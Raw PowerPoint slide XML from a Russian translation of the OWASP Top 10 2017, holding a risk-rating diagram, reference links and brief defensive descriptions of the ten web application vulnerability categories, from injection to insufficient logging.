          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="2466975"/>
              <a:ext cx="762000" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 125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2362201" y="2466971"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3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4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498475" y="2924177"/>
              <a:ext cx="139699" cy="304801"/>
              <a:chOff x="96" y="1344"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="Oval 64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H="1">
                <a:off x="96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>
                <a:off x="240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>
                <a:off x="9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40" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="2924175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Атака</a:t>
              </a:r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1325915" y="2088380"/>
              <a:ext cx="607859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Векторы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</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="ru-RU" sz="900" b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42" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2680936" y="2088380"/>
              <a:ext cx="870752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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Недостатки</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="ru-RU" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>безопасности</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4581012" y="2088380"/>
              <a:ext cx="716864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Технические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  <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="ru-RU" sz="900" b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44" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5760742" y="2088380"/>
              <a:ext cx="697628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для бизнеса</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="ru-RU" sz="900" b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45" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="3352800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Атака</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="2924175"/>
              <a:ext cx="762000" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner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sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="3381375"/>
              <a:ext cx="762000" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner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sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="3486120"/>
              <a:ext cx="685800" cy="428655"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 25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Актив</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="3076575"/>
              <a:ext cx="685800" cy="428655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Функция</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="2686020"/>
              <a:ext cx="685800" cy="428655"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 25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Актив</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="2905125"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66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67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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="52" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="66" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490729" cy="211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sp>
          <p:nvSpPr>
            <p:cNvPr id="79" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733800" y="2476500"/>
              <a:ext cx="457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600" b="1" dirty="0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Настройка</a:t>
              </a:r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3733799" y="2914650"/>
              <a:ext cx="457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600" b="1" dirty="0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Настройка</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733800" y="381000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600" b="1" dirty="0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Настройка</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362200" y="3800475"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="85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86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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="98" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="56" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490729" cy="44026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02" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="3" idx="3"/>
              <a:endCxn id="79" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="2666731"/>
              <a:ext cx="228600" cy="26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05" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="66" idx="3"/>
              <a:endCxn id="80" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="3104885"/>
              <a:ext cx="228599" cy="265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4" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="752475" y="2657475"/>
              <a:ext cx="619125" cy="238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20" name="AutoShape 149"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="64" idx="4"/>
              <a:endCxn id="19" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5334000" y="2657475"/>
              <a:ext cx="381000" cy="242873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6" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="79" idx="3"/>
              <a:endCxn id="64" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4191000" y="2667000"/>
              <a:ext cx="457200" cy="23334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58" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="80" idx="3"/>
              <a:endCxn id="64" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4190999" y="2900348"/>
              <a:ext cx="457201" cy="2048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33" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="752475" y="2657475"/>
              <a:ext cx="619125" cy="4191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AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="81" idx="3"/>
              <a:endCxn id="62" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4191000" y="3290903"/>
              <a:ext cx="457200" cy="70959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AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="85" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490728" cy="89746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AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="85" idx="3"/>
              <a:endCxn id="81" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505199" y="4000235"/>
              <a:ext cx="228601" cy="26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AutoShape 149"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="62" idx="4"/>
              <a:endCxn id="19" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5334000" y="2657475"/>
              <a:ext cx="381000" cy="63342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Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3624935" y="2090853"/>
              <a:ext cx="659155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Настройки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безопасности</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Textplatzhalter 17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 sz="2400" dirty="0"/>
              <a:t>Угрозы</a:t>
            </a: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" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Угрозы безопасности приложений</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="69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48812"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4953578"/>
          <a:ext cx="4495800" cy="41832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Что </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" u="sng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мне</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1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грозит?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57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Главной задачей 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Топ-10 OWASP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является определение наиболее серьезных угроз безопасности веб-приложений для широкого круга организаций. Для каждой из этих угроз дается общая информация о вероятности ее возникновения и возможных технических последствиях, полученная и использованием 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Методики оценки рисков OWASP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lv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lang="ru-RU" sz="8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 этом выпуске мы обновили систему оценки рисков для облегчения расчета вероятности возникновения и возможного ущерба для любой угрозы. Более подробную информацию можно узнать в разделе </a:t>
                      </a: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Об угрозах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Нет одинаковых организаций, как нет одинаковых злоумышленников, целей и последствий атак. Если общественная организация использует некую систему управления контентом (CMS) для публикации новостей, а медицинское учреждение использует такую же систему для хранения медицинских данных, то угрозы и риски для этих организаций будут сильно отличаться. Очень важно определять риски для вашей организации, исходя из применимых к ней угроз и возможных последствий атак.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Где это возможно, для унификации общепринятых наименований и снижения риска возникновения путаницы, названия угроз в Топ-10 соответствуют названиям уязвимостей из списка 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CWE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 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16483"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5887936"/>
          <a:ext cx="4464115" cy="122063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6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692"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Источники угроз</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="ru-RU" sz="6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эксплуатации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Распространенность</a:t>
                      </a:r>
                    </a:p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уязвимости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обнаружения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 последствия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3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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="7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приложения</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="46800" marR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Просто: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="8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Очень</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="6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 распространенная</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="68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ru-RU" sz="7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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="7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Просто: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="8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Тяжелые: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="8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бизнеса</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="46800" marR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97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Средне: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Распространенная:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="6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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="6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Средне: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Умеренные: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Редкая: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8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Незначительные:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="68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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="68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47795"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4558442" y="4953000"/>
          <a:ext cx="2299557" cy="41832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2299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665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Ссылки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535">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150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</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1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Методика оценки рисков OWASP</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1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Раздел о моделировании угроз/рисков</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPts val="1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marL="57150" indent="-571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Сторонние</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="8280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ISO 31000: Менеджмент рисков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ISO 27001: Менеджмент информационной безопасности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Фреймворк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кибербезопасности</a:t>
                      </a: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 NIST (US)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Методы устранения последствий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кибератак</a:t>
                      </a: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 (AU)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NIST CVSS 3.0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Средства моделирования угроз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Microsoft</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" sz="950" u="none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  <a:hlinkClick r:id="rId14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116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T10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Топ-10 OWASP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0"/>
              <a:t>Угрозы безопасности приложений – 2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0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5308A3-3666-418A-9AE6-240E4688F2BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-685800" y="990600"/>
            <a:ext cx="8153400" cy="8001000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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00BBCDD-13C0-4D97-9CEC-01B8726246D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="1023387"/>
            <a:ext cx="5218177" cy="6819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Уязвимости, связанные, например, с внедрением SQL,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NoSQL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OS и LDAP, возникают, когда непроверенные данные отправляются интерпретатору в составе команды или запроса. Вредоносные данные могут заставить интерпретатор выполнить непредусмотренные команды или обратиться к данным без прохождения соответствующей авторизации.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7AB65A7-CD59-4B0C-BAB0-A853DD609B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="1014215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b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A1:2017-Внедрение</a:t>
            </a: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9D11D811-BC41-418D-90D1-CD609B0626DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="1874768"/>
            <a:ext cx="5218177" cy="6117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Функции приложений, связанные с аутентификацией и управлением сессиями, часто некорректно реализуются, позволяя злоумышленникам скомпрометировать пароли, ключи или сессионные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токены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а также эксплуатировать другие ошибки реализации для временного или постоянного перехвата учетных записей пользователей.</a:t>
            </a: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56513DEF-2444-40AD-AE64-66E7CC6256D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="1817196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A2:2017-Недостатки аутентификации</a:t>
            </a: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5F0014DB-969D-4359-A7D1-99F0AAA09C12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="2598411"/>
            <a:ext cx="5218177" cy="7454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Многие веб-приложения и API имеют плохую защиту важных финансовых, медицинских или персональных данных. Злоумышленники могут похитить или изменить эти данные, а затем осуществить мошеннические действия с кредитными картами или персональными данными. Конфиденциальные данные требуют дополнительных мер защиты, например их шифрования при хранении или передаче, а также специальных мер предосторожности при работе с браузером.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BF109756-C917-4ECB-9826-AC54F0948B32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="2620178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9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A3:2017-Разглашение конфиденциальных данных</a:t>
            </a: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B2A0868A-364E-4487-8030-7C4BD69D47DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="3536885"/>
            <a:ext cx="5218177" cy="53151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Старые или плохо настроенные XML-процессоры обрабатывают ссылки на внешние сущности внутри документов. Эти сущности могут быть использованы для доступа к внутренним файлам через обработчики URI файлов, общие папки, сканирование портов, удаленное выполнения кода и отказ в обслуживании.</a:t>
            </a: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3635AA73-30CD-4FEB-BBAF-A9AD20490C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="3425038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A4:2017-Внешние сущности XML (XXE)</a:t>
            </a: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25F57B3B-227A-4B44-B219-FB6A81F17116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="4208842"/>
            <a:ext cx="5218177" cy="7409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Действия, разрешенные аутентифицированным пользователям, зачастую некорректно контролируются. Злоумышленники могут воспользоваться этими недостатками и получить несанкционированный доступ к учетным записям других пользователей или конфиденциальной информации, а также изменить пользовательские данные или права доступа.</a:t>
            </a:r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0F2374FD-7476-44F3-B906-9417B048A9A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="4228019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A5:2017-Недостатки контроля доступа</a:t>
            </a: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AA4B2B9D-42EE-48ED-AED4-5EA8E4B64D6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1490400" y="5002097"/>
            <a:ext cx="5218177" cy="758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Некорректная настройка безопасности является распространенной ошибкой. Это происходит из-за использования стандартных параметров безопасности, неполной или специфичной настройки, открытого облачного хранения, некорректных HTTP-заголовков и подробных сообщений об ошибках, содержащих критически важные данные. Все ОС,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библиотеки и приложения должны быть не только настроены должным образом, но и своевременно корректироваться и обновляться.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Freeform 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A858E023-0889-4FE9-9B01-62527B94C07F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="5031000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E4E0F83D-B235-48A5-A352-7B6BBC2BAE17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="5789712"/>
            <a:ext cx="5218177" cy="8682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XSS имеет место, когда приложение добавляет непроверенные данные на новую веб-страницу без их соответствующей проверки или преобразования, или когда обновляет открытую страницу через API браузера, используя предоставленные пользователем данные, содержащие HTML- или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-код. С помощью XSS злоумышленники могут выполнять сценарии в браузере жертвы, позволяющие им перехватывать пользовательские сессии, подменять страницы сайта или перенаправлять пользователей на вредоносные сайты.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Freeform 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC128063-7A66-4F34-A720-2EAB6E988467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="5833981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A7:2017-Межсайтовое выполнение сценариев (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody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3E895283-6404-4647-9AED-A7928C930CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="6731648"/>
            <a:ext cx="5218177" cy="5125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Небезопасная десериализация часто приводит к удаленному выполнению кода. Ошибки десериализации, не приводящие к удаленному выполнению кода, могут быть использованы для атак с повторным воспроизведением, внедрением и повышением привилегий. </a:t>
            </a:r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1770D43A-73DB-44C0-AF41-71E9A314BA2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="6636962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A8:2017-Небезопасная </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="11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десериализация</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="11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1D3ABA2A-B6B4-4A1F-B3F6-D4C323A211D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505711" y="7460959"/>
            <a:ext cx="5218177" cy="6804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Компоненты, такие как библиотеки,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программные модули, запускаются с привилегиями приложения. Эксплуатация уязвимого компонента может привести к потере данных или перехвату контроля над сервером. Использование приложениями и API компонентов с известными уязвимостями может нарушить защиту приложения и привести к серьезным последствиям. </a:t>
            </a:r>
          </a:p>
        </p:txBody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591F4221-9110-4B57-9D5B-633059706604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="7435423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A9:2017-Использование компонентов с известными уязвимостями</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Freeform 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49216BAC-D272-467A-B5B1-631A0C551A99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1502002" y="8215093"/>
            <a:ext cx="5218177" cy="7717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Недостатки журналирования и мониторинга, а также отсутствие или неэффективное использование системы реагирования на инциденты, позволяют злоумышленникам развить атаку, скрыть свое присутствие и проникнуть в другие системы, а также изменить, извлечь или уничтожить данные. Проникновение в систему обычно обнаруживают только через 200 дней и, как правило, сторонние исследователи, а не в рамках внутренних проверок или мониторинга. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Freeform 25">
            <a:extLst>
